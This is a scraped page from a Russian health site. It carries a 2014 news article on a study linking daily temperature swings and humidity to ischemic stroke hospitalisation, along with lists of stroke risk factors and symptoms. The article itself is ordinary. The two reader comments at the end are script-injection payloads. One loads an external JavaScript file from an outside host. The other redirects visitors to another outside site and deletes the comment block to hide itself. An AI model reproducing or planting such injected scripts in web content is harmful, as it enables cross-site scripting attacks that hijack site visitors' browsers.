Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Проверьте прогноз погоды!...  >>  Проверьте прогноз погоды! От этого зависит, будет у вас инсульт или нет!
 
Обратная связь
 

Проверьте прогноз погоды! От этого зависит, будет у вас инсульт или нет!

Размер шрифта
25 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

От того, тепло или холодно на улице, теперь может зависеть даже риск оказаться в больнице. Были найдены достоверные данные о влиянии погодных условий на вероятность развития ишемического инсульта, особенно у людей с предрасположенностью к данному заболеванию.

Проверьте прогноз погоды! От этого зависит будет у вас инсульт или нет!

Госпитализация по причине инсульта и уровень смертности могут увеличиваться и уменьшаться в зависимости от изменений температуры окружающей среды и уровня влажности. Такие данные были получены в работе, представленной на Международной конференции по проблемам инсульта в 2014 году.

«Погода это не то, что люди обычно ассоциируют с риском инсульта. Однако мы обнаружили, что погодные условия входят в перечень множества факторов, которые связаны с госпитализацией вследствие этого заболевания», – говорит Джудит Личтман, автор исследования и профессор эпидемиологии в Йельской Школе общественного здоровья в Нью-Хейвене, Коннектикут.

Исследователи проанализировали выборку в 134 510 человек, 18 лет и старше, доставленных в больницы в 2009-2010 годах в связи с ишемическим инсультом (вызванным тромбом, который блокирует кровоток к головному мозгу или внутри него). Затем они оценили температуру и значение точки конденсации влаги в течение всего этого периода времени.

Было обнаружено следующее:

  • Более значительные изменения температуры в течение дня и более высокая точка конденсации (отражающая степень влажности воздуха) были связаны с более высоким уровнем госпитализации.
  • Более низкие среднегодовые значения температур связаны с повышенным уровнем госпитализации и смертности вследствие инсульта
  • С каждым повышением средней температуры на 1 градус Фаренгейта наблюдалось снижение вероятности госпитализации по причине инсульта на 0,86% и снижение смертности в больнице на 1,1%.
  • Повышение колебаний температуры и точки конденсации в течение дня были связаны с увеличением вероятности госпитализации, но не вероятности смерти в больнице.

«Данная работа дает возможность предполагать, что метеорологические показатели, такие как дневные колебания температуры и повышенная влажность, могут быть стрессовыми факторами, которые ведут к увеличению уровня госпитализаций из-за инсульта», – считает Личтман. «Люди с повышенным риском развития инсульта должны стараться избегать нахождения в местах со значительными изменениями температуры и высокой влажностью и, как и всегда, быть готовыми действовать незамедлительно, если у них или их близких появились симптомы инсульта. Необходимы дальнейшие исследования, чтобы лучше понять влияние изменений погодных условий, а также выявить возможные механизмы такого влияния».

Факторы риска инсульта, которые можно изменить, вылечить или же контролировать, включают в себя высокое давление, курение, диабет, различные заболевания артерий, особенно сонных, фибрилляцию предсердий и другие заболевания сердца, серповидно-клеточную болезнь, высокий уровень холестерина в крови, плохое питание, отсутствие физической активности, ожирение, а также избыточное употребление алкоголя.

Симптомами инсульта являются паралич лица, затруднения речи, внезапное онемение или слабость в ноге, руке или лице, спутанность сознания или нарушение понимания происходящего, нарушения зрения на одном или обоих глазах, внезапные нарушения походки, головокружение, потеря равновесия, координации, а также резко возникшая без видимой причины сильная головная боль.

Описанные выше новые данные об  этом тяжелом состоянии, а также хорошее понимание его факторов риска и симптомов, – необходимые условия своевременного оказания помощи таким больным.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Обычные прогулки избавят вас от инсульта! Сколько гулять?   В какой день нельзя идти в больницу!   Горький шоколад полезен для сердца! Но все благодаря бактериям!   Не психуй! Взрывы гнева увеличивают шансы инфаркта!  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Зачем спать 10 затем
Что заставит вас храпеть
Чем полезен секс?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.